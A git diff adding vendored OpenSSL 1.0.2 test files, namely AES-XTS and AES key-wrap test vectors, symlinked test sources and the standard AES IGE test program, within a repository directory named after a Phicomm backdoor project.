+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f1011:d069444b7a7e0cab09e24447d24deb1fedbf
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f101112:e5df1351c0544ba1350b3363cd8ef4beedbf9d
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f10111213:9d84c813f719aa2c7be3f66171c7c5c2edbf9dac
+aes-128-xts:e0e1e2e3e4e5e6e7e8e9eaebecedeeefc0c1c2c3c4c5c6c7c8c9cacbcccdcecf:21436587a90000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:38b45812ef43a05bd957e545907e223b954ab4aaf088303ad910eadf14b42be68b2461149d8c8ba85f992be970bc621f1b06573f63e867bf5875acafa04e42ccbd7bd3c2a0fb1fff791ec5ec36c66ae4ac1e806d81fbf709dbe29e471fad38549c8e66f5345d7c1eb94f405d1ec785cc6f6a68f6254dd8339f9d84057e01a17741990482999516b5611a38f41bb6478e6f173f320805dd71b1932fc333cb9ee39936beea9ad96fa10fb4112b901734ddad40bc1878995f8e11aee7d141a2f5d48b7a4e1e7f0b2c04830e69a4fd1378411c2f287edf48c6c4e5c247a19680f7fe41cefbd49b582106e3616cbbe4dfb2344b2ae9519391f3e0fb4922254b1d6d2d19c6d4d537b3a26f3bcc51588b32f3eca0829b6a5ac72578fb814fb43cf80d64a233e3f997a3f02683342f2b33d25b492536b93becb2f5e1a8b82f5b883342729e8ae09d16938841a21a97fb543eea3bbff59f13c1a18449e398701c1ad51648346cbc04c27bb2da3b93a1372ccae548fb53bee476f9e9c91773b1bb19828394d55d3e1a20ed69113a860b6829ffa847224604435070221b257e8dff783615d2cae4803a93aa4334ab482a0afac9c0aeda70b45a481df5dec5df8cc0f423c77a5fd46cd312021d4b438862419a791be03bb4d97c0e59578542531ba466a83baf92cefc151b5cc1611a167893819b63fb8a6b18e86de60290fa72b797b0ce59f3
+# AES wrap tests from RFC3394
+id-aes128-wrap:000102030405060708090A0B0C0D0E0F::00112233445566778899AABBCCDDEEFF:1FA68B0A8112B447AEF34BD8FB5A7B829D3E862371D2CFE5
+id-aes192-wrap:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF:96778B25AE6CA435F92B5B97C050AED2468AB8A17AD84E5D
+id-aes256-wrap:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF:64E8C3F9CE0F5BA263E9777905818A2A93C8191E7D6E8AE7
+id-aes192-wrap:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF0001020304050607:031D33264E15D33268F24EC260743EDCE1C6C7DDEE725A936BA814915C6762D2
+id-aes256-wrap:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF0001020304050607:A8F9BC1612C68B3FF6E6F4FBE30E71E4769C8B80A32CB8958CD5D17D6B254DA1
+id-aes256-wrap:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF000102030405060708090A0B0C0D0E0F:28C9F404C4B810F4CBCCB35CFB87F8263F5786E2D80ED326CBC7F0E71A99F43BFB988B9B7A02DD21
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/exptest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/exptest.c
new file mode 120000
index 0000000..50ccf71
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/exptest.c
@@ -0,0 +1 @@
+../crypto/bn/exptest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/heartbeat_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/heartbeat_test.c
new file mode 120000
index 0000000..79576fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/heartbeat_test.c
@@ -0,0 +1 @@
+../ssl/heartbeat_test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/hmactest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/hmactest.c
new file mode 120000
index 0000000..353ee2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/hmactest.c
@@ -0,0 +1 @@
+../crypto/hmac/hmactest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ideatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ideatest.c
new file mode 120000
index 0000000..a9bfb3d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ideatest.c
@@ -0,0 +1 @@
+../crypto/idea/ideatest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/igetest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/igetest.c
new file mode 100644
index 0000000..0c7b357
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/igetest.c
@@ -0,0 +1,484 @@
+/* test/igetest.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/aes.h>
+#include <openssl/rand.h>
+#include <stdio.h>
+#include <string.h>
+#include <assert.h>
+
+#define TEST_SIZE       128
+#define BIG_TEST_SIZE 10240
+
+static void hexdump(FILE *f, const char *title, const unsigned char *s, int l)
+{
+    int n = 0;
+
+    fprintf(f, "%s", title);
+    for (; n < l; ++n) {
+        if ((n % 16) == 0)
+            fprintf(f, "\n%04x", n);
+        fprintf(f, " %02x", s[n]);
+    }
+    fprintf(f, "\n");
+}
+
+#define MAX_VECTOR_SIZE 64
+
+struct ige_test {
+    const unsigned char key[16];
+    const unsigned char iv[32];
+    const unsigned char in[MAX_VECTOR_SIZE];
+    const unsigned char out[MAX_VECTOR_SIZE];
+    const size_t length;
+    const int encrypt;
+};
+
+static struct ige_test const ige_test_vectors[] = {
+    {{0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
+      0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f}, /* key */
+     {0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
+      0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f,
+      0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
+      0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f}, /* iv */
+     {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, /* in */
+     {0x1a, 0x85, 0x19, 0xa6, 0x55, 0x7b, 0xe6, 0x52,
+      0xe9, 0xda, 0x8e, 0x43, 0xda, 0x4e, 0xf4, 0x45,
+      0x3c, 0xf4, 0x56, 0xb4, 0xca, 0x48, 0x8a, 0xa3,
+      0x83, 0xc7, 0x9c, 0x98, 0xb3, 0x47, 0x97, 0xcb}, /* out */
+     32, AES_ENCRYPT},          /* test vector 0 */
+
+    {{0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20,
+      0x61, 0x6e, 0x20, 0x69, 0x6d, 0x70, 0x6c, 0x65}, /* key */
+     {0x6d, 0x65, 0x6e, 0x74, 0x61, 0x74, 0x69, 0x6f,
+      0x6e, 0x20, 0x6f, 0x66, 0x20, 0x49, 0x47, 0x45,
+      0x20, 0x6d, 0x6f, 0x64, 0x65, 0x20, 0x66, 0x6f,
+      0x72, 0x20, 0x4f, 0x70, 0x65, 0x6e, 0x53, 0x53}, /* iv */
+     {0x4c, 0x2e, 0x20, 0x4c, 0x65, 0x74, 0x27, 0x73,
+      0x20, 0x68, 0x6f, 0x70, 0x65, 0x20, 0x42, 0x65,
+      0x6e, 0x20, 0x67, 0x6f, 0x74, 0x20, 0x69, 0x74,
+      0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x21, 0x0a}, /* in */
+     {0x99, 0x70, 0x64, 0x87, 0xa1, 0xcd, 0xe6, 0x13,
+      0xbc, 0x6d, 0xe0, 0xb6, 0xf2, 0x4b, 0x1c, 0x7a,
+      0xa4, 0x48, 0xc8, 0xb9, 0xc3, 0x40, 0x3e, 0x34,
+      0x67, 0xa8, 0xca, 0xd8, 0x93, 0x40, 0xf5, 0x3b}, /* out */
+     32, AES_DECRYPT},          /* test vector 1 */
+};
+
+struct bi_ige_test {
+    const unsigned char key1[32];
+    const unsigned char key2[32];
+    const unsigned char iv[64];
+    const unsigned char in[MAX_VECTOR_SIZE];
+    const unsigned char out[MAX_VECTOR_SIZE];
+    const size_t keysize;
+    const size_t length;
+    const int encrypt;
+};
+
+static struct bi_ige_test const bi_ige_test_vectors[] = {
+    {{0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
+      0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f}, /* key1 */
+     {0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
+      0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f}, /* key2 */
+     {0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
+      0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f,
+      0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
+      0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f,
+      0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
+      0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f,
+      0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
+      0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f}, /* iv */
+     {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, /* in */
+     {0x14, 0x40, 0x6f, 0xae, 0xa2, 0x79, 0xf2, 0x56,
+      0x1f, 0x86, 0xeb, 0x3b, 0x7d, 0xff, 0x53, 0xdc,
+      0x4e, 0x27, 0x0c, 0x03, 0xde, 0x7c, 0xe5, 0x16,
+      0x6a, 0x9c, 0x20, 0x33, 0x9d, 0x33, 0xfe, 0x12}, /* out */
+     16, 32, AES_ENCRYPT},      /* test vector 0 */
+    {{0x58, 0x0a, 0x06, 0xe9, 0x97, 0x07, 0x59, 0x5c,
+      0x9e, 0x19, 0xd2, 0xa7, 0xbb, 0x40, 0x2b, 0x7a,
+      0xc7, 0xd8, 0x11, 0x9e, 0x4c, 0x51, 0x35, 0x75,
+      0x64, 0x28, 0x0f, 0x23, 0xad, 0x74, 0xac, 0x37}, /* key1 */
+     {0xd1, 0x80, 0xa0, 0x31, 0x47, 0xa3, 0x11, 0x13,
+      0x86, 0x26, 0x9e, 0x6d, 0xff, 0xaf, 0x72, 0x74,
+      0x5b, 0xa2, 0x35, 0x81, 0xd2, 0xa6, 0x3d, 0x21,
+      0x67, 0x7b, 0x58, 0xa8, 0x18, 0xf9, 0x72, 0xe4}, /* key2 */
+     {0x80, 0x3d, 0xbd, 0x4c, 0xe6, 0x7b, 0x06, 0xa9,
+      0x53, 0x35, 0xd5, 0x7e, 0x71, 0xc1, 0x70, 0x70,
+      0x74, 0x9a, 0x00, 0x28, 0x0c, 0xbf, 0x6c, 0x42,
+      0x9b, 0xa4, 0xdd, 0x65, 0x11, 0x77, 0x7c, 0x67,
+      0xfe, 0x76, 0x0a, 0xf0, 0xd5, 0xc6, 0x6e, 0x6a,
+      0xe7, 0x5e, 0x4c, 0xf2, 0x7e, 0x9e, 0xf9, 0x20,
+      0x0e, 0x54, 0x6f, 0x2d, 0x8a, 0x8d, 0x7e, 0xbd,
+      0x48, 0x79, 0x37, 0x99, 0xff, 0x27, 0x93, 0xa3}, /* iv */
+     {0xf1, 0x54, 0x3d, 0xca, 0xfe, 0xb5, 0xef, 0x1c,
+      0x4f, 0xa6, 0x43, 0xf6, 0xe6, 0x48, 0x57, 0xf0,
+      0xee, 0x15, 0x7f, 0xe3, 0xe7, 0x2f, 0xd0, 0x2f,
+      0x11, 0x95, 0x7a, 0x17, 0x00, 0xab, 0xa7, 0x0b,
+      0xbe, 0x44, 0x09, 0x9c, 0xcd, 0xac, 0xa8, 0x52,
+      0xa1, 0x8e, 0x7b, 0x75, 0xbc, 0xa4, 0x92, 0x5a,
+      0xab, 0x46, 0xd3, 0x3a, 0xa0, 0xd5, 0x35, 0x1c,
+      0x55, 0xa4, 0xb3, 0xa8, 0x40, 0x81, 0xa5, 0x0b}, /* in */
+     {0x42, 0xe5, 0x28, 0x30, 0x31, 0xc2, 0xa0, 0x23,
+      0x68, 0x49, 0x4e, 0xb3, 0x24, 0x59, 0x92, 0x79,
+      0xc1, 0xa5, 0xcc, 0xe6, 0x76, 0x53, 0xb1, 0xcf,
+      0x20, 0x86, 0x23, 0xe8, 0x72, 0x55, 0x99, 0x92,
+      0x0d, 0x16, 0x1c, 0x5a, 0x2f, 0xce, 0xcb, 0x51,
+      0xe2, 0x67, 0xfa, 0x10, 0xec, 0xcd, 0x3d, 0x67,
+      0xa5, 0xe6, 0xf7, 0x31, 0x26, 0xb0, 0x0d, 0x76,
+      0x5e, 0x28, 0xdc, 0x7f, 0x01, 0xc5, 0xa5, 0x4c}, /* out */
+     32, 64, AES_ENCRYPT},      /* test vector 1 */
+
+};
+
+static int run_test_vectors(void)
+{
+    unsigned int n;
+    int errs = 0;
+
+    for (n = 0; n < sizeof(ige_test_vectors) / sizeof(ige_test_vectors[0]);
+         ++n) {
+        const struct ige_test *const v = &ige_test_vectors[n];
+        AES_KEY key;
+        unsigned char buf[MAX_VECTOR_SIZE];
+        unsigned char iv[AES_BLOCK_SIZE * 2];
+
+        assert(v->length <= MAX_VECTOR_SIZE);
+
+        if (v->encrypt == AES_ENCRYPT)
+            AES_set_encrypt_key(v->key, 8 * sizeof v->key, &key);
+        else
+            AES_set_decrypt_key(v->key, 8 * sizeof v->key, &key);
+        memcpy(iv, v->iv, sizeof iv);
+        AES_ige_encrypt(v->in, buf, v->length, &key, iv, v->encrypt);
+
+        if (memcmp(v->out, buf, v->length)) {
+            printf("IGE test vector %d failed\n", n);
+            hexdump(stdout, "key", v->key, sizeof v->key);
+            hexdump(stdout, "iv", v->iv, sizeof v->iv);
+            hexdump(stdout, "in", v->in, v->length);
+            hexdump(stdout, "expected", v->out, v->length);
+            hexdump(stdout, "got", buf, v->length);
+
+            ++errs;
+        }
+
+        /* try with in == out */
+        memcpy(iv, v->iv, sizeof iv);
+        memcpy(buf, v->in, v->length);
+        AES_ige_encrypt(buf, buf, v->length, &key, iv, v->encrypt);
+
+        if (memcmp(v->out, buf, v->length)) {
+            printf("IGE test vector %d failed (with in == out)\n", n);
+            hexdump(stdout, "key", v->key, sizeof v->key);
+            hexdump(stdout, "iv", v->iv, sizeof v->iv);
+            hexdump(stdout, "in", v->in, v->length);
+            hexdump(stdout, "expected", v->out, v->length);
+            hexdump(stdout, "got", buf, v->length);
+
+            ++errs;
+        }
+    }
+
+    for (n = 0;
+         n < sizeof(bi_ige_test_vectors) / sizeof(bi_ige_test_vectors[0]);
+         ++n) {
+        const struct bi_ige_test *const v = &bi_ige_test_vectors[n];
+        AES_KEY key1;
+        AES_KEY key2;
+        unsigned char buf[MAX_VECTOR_SIZE];
+
+        assert(v->length <= MAX_VECTOR_SIZE);
+
+        if (v->encrypt == AES_ENCRYPT) {
+            AES_set_encrypt_key(v->key1, 8 * v->keysize, &key1);
+            AES_set_encrypt_key(v->key2, 8 * v->keysize, &key2);
+        } else {
+            AES_set_decrypt_key(v->key1, 8 * v->keysize, &key1);
+            AES_set_decrypt_key(v->key2, 8 * v->keysize, &key2);
+        }
+
+        AES_bi_ige_encrypt(v->in, buf, v->length, &key1, &key2, v->iv,
+                           v->encrypt);
+
+        if (memcmp(v->out, buf, v->length)) {
+            printf("Bidirectional IGE test vector %d failed\n", n);
+            hexdump(stdout, "key 1", v->key1, sizeof v->key1);
+            hexdump(stdout, "key 2", v->key2, sizeof v->key2);
+            hexdump(stdout, "iv", v->iv, sizeof v->iv);
+            hexdump(stdout, "in", v->in, v->length);
+            hexdump(stdout, "expected", v->out, v->length);
+            hexdump(stdout, "got", buf, v->length);
+
+            ++errs;
+        }
+    }
+
+    return errs;
+}
+
+int main(int argc, char **argv)
+{
+    unsigned char rkey[16];
+    unsigned char rkey2[16];
+    AES_KEY key;
+    AES_KEY key2;
+    unsigned char plaintext[BIG_TEST_SIZE];
+    unsigned char ciphertext[BIG_TEST_SIZE];
+    unsigned char checktext[BIG_TEST_SIZE];
+    unsigned char iv[AES_BLOCK_SIZE * 4];
+    unsigned char saved_iv[AES_BLOCK_SIZE * 4];
+    int err = 0;
+    unsigned int n;
+    unsigned matches;
+
+    assert(BIG_TEST_SIZE >= TEST_SIZE);
+
+    RAND_pseudo_bytes(rkey, sizeof rkey);
+    RAND_pseudo_bytes(plaintext, sizeof plaintext);
+    RAND_pseudo_bytes(iv, sizeof iv);
+    memcpy(saved_iv, iv, sizeof saved_iv);
+
+    /* Forward IGE only... */
+
+    /* Straight encrypt/decrypt */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_ige_encrypt(plaintext, ciphertext, TEST_SIZE, &key, iv, AES_ENCRYPT);
+
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(ciphertext, checktext, TEST_SIZE, &key, iv, AES_DECRYPT);
+
+    if (memcmp(checktext, plaintext, TEST_SIZE)) {
+        printf("Encrypt+decrypt doesn't match\n");
+        hexdump(stdout, "Plaintext", plaintext, TEST_SIZE);
+        hexdump(stdout, "Checktext", checktext, TEST_SIZE);
+        ++err;
+    }
+
+    /* Now check encrypt chaining works */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(plaintext, ciphertext, TEST_SIZE / 2, &key, iv,
+                    AES_ENCRYPT);
+    AES_ige_encrypt(plaintext + TEST_SIZE / 2,
+                    ciphertext + TEST_SIZE / 2, TEST_SIZE / 2,
+                    &key, iv, AES_ENCRYPT);
+
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(ciphertext, checktext, TEST_SIZE, &key, iv, AES_DECRYPT);
+
+    if (memcmp(checktext, plaintext, TEST_SIZE)) {
+        printf("Chained encrypt+decrypt doesn't match\n");
+        hexdump(stdout, "Plaintext", plaintext, TEST_SIZE);
+        hexdump(stdout, "Checktext", checktext, TEST_SIZE);
+        ++err;
+    }
+
+    /* And check decrypt chaining */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(plaintext, ciphertext, TEST_SIZE / 2, &key, iv,
+                    AES_ENCRYPT);
+    AES_ige_encrypt(plaintext + TEST_SIZE / 2,
+                    ciphertext + TEST_SIZE / 2, TEST_SIZE / 2,
+                    &key, iv, AES_ENCRYPT);
+
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(ciphertext, checktext, TEST_SIZE / 2, &key, iv,
+                    AES_DECRYPT);
+    AES_ige_encrypt(ciphertext + TEST_SIZE / 2,
+                    checktext + TEST_SIZE / 2, TEST_SIZE / 2, &key, iv,
+                    AES_DECRYPT);
+
+    if (memcmp(checktext, plaintext, TEST_SIZE)) {
+        printf("Chained encrypt+chained decrypt doesn't match\n");
+        hexdump(stdout, "Plaintext", plaintext, TEST_SIZE);
+        hexdump(stdout, "Checktext", checktext, TEST_SIZE);
+        ++err;
+    }
+
+    /* make sure garble extends forwards only */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(plaintext, ciphertext, sizeof plaintext, &key, iv,
+                    AES_ENCRYPT);
+
+    /* corrupt halfway through */
+    ++ciphertext[sizeof ciphertext / 2];
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    memcpy(iv, saved_iv, sizeof iv);
+    AES_ige_encrypt(ciphertext, checktext, sizeof checktext, &key, iv,
+                    AES_DECRYPT);
+
+    matches = 0;
+    for (n = 0; n < sizeof checktext; ++n)
+        if (checktext[n] == plaintext[n])
+            ++matches;
+
+    if (matches > sizeof checktext / 2 + sizeof checktext / 100) {
+        printf("More than 51%% matches after garbling\n");
+        ++err;
+    }
+
+    if (matches < sizeof checktext / 2) {
+        printf("Garble extends backwards!\n");
+        ++err;
+    }
+
+    /* Bi-directional IGE */
+
+    /*
+     * Note that we don't have to recover the IV, because chaining isn't
+     */
+    /* possible with biIGE, so the IV is not updated. */
+
+    RAND_pseudo_bytes(rkey2, sizeof rkey2);
+
+    /* Straight encrypt/decrypt */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_encrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_bi_ige_encrypt(plaintext, ciphertext, TEST_SIZE, &key, &key2, iv,
+                       AES_ENCRYPT);
+
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_decrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_bi_ige_encrypt(ciphertext, checktext, TEST_SIZE, &key, &key2, iv,
+                       AES_DECRYPT);
+
+    if (memcmp(checktext, plaintext, TEST_SIZE)) {
+        printf("Encrypt+decrypt doesn't match\n");
+        hexdump(stdout, "Plaintext", plaintext, TEST_SIZE);
+        hexdump(stdout, "Checktext", checktext, TEST_SIZE);
+        ++err;
+    }
+
+    /* make sure garble extends both ways */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_encrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_ige_encrypt(plaintext, ciphertext, sizeof plaintext, &key, iv,
+                    AES_ENCRYPT);
+
+    /* corrupt halfway through */
+    ++ciphertext[sizeof ciphertext / 2];
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_decrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_ige_encrypt(ciphertext, checktext, sizeof checktext, &key, iv,
+                    AES_DECRYPT);
+
+    matches = 0;
+    for (n = 0; n < sizeof checktext; ++n)
+        if (checktext[n] == plaintext[n])
+            ++matches;
+
+    if (matches > sizeof checktext / 100) {
+        printf("More than 1%% matches after bidirectional garbling\n");
+        ++err;
+    }
+
+    /* make sure garble extends both ways (2) */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_encrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_ige_encrypt(plaintext, ciphertext, sizeof plaintext, &key, iv,
+                    AES_ENCRYPT);
+
+    /* corrupt right at the end */
+    ++ciphertext[sizeof ciphertext - 1];
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_decrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_ige_encrypt(ciphertext, checktext, sizeof checktext, &key, iv,
+                    AES_DECRYPT);
+
+    matches = 0;
+    for (n = 0; n < sizeof checktext; ++n)
+        if (checktext[n] == plaintext[n])
+            ++matches;
+
+    if (matches > sizeof checktext / 100) {
+        printf("More than 1%% matches after bidirectional garbling (2)\n");
+        ++err;
+    }
+
+    /* make sure garble extends both ways (3) */
+    AES_set_encrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_encrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_ige_encrypt(plaintext, ciphertext, sizeof plaintext, &key, iv,
+                    AES_ENCRYPT);
+
+    /* corrupt right at the start */
+    ++ciphertext[0];
+    AES_set_decrypt_key(rkey, 8 * sizeof rkey, &key);
+    AES_set_decrypt_key(rkey2, 8 * sizeof rkey2, &key2);
+    AES_ige_encrypt(ciphertext, checktext, sizeof checktext, &key, iv,
+                    AES_DECRYPT);
+
+    matches = 0;
+    for (n = 0; n < sizeof checktext; ++n)
+        if (checktext[n] == plaintext[n])
+            ++matches;
+
+    if (matches > sizeof checktext / 100) {
+        printf("More than 1%% matches after bidirectional garbling (3)\n");
+        ++err;
+    }
+
+    err += run_test_vectors();
+
+    return err;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/jpaketest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/jpaketest.c
new file mode 100644
index 0000000..554acc2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/jpaketest.c
@@ -0,0 +1,57 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <openssl/e_os2.h>
+#include <openssl/buffer.h>
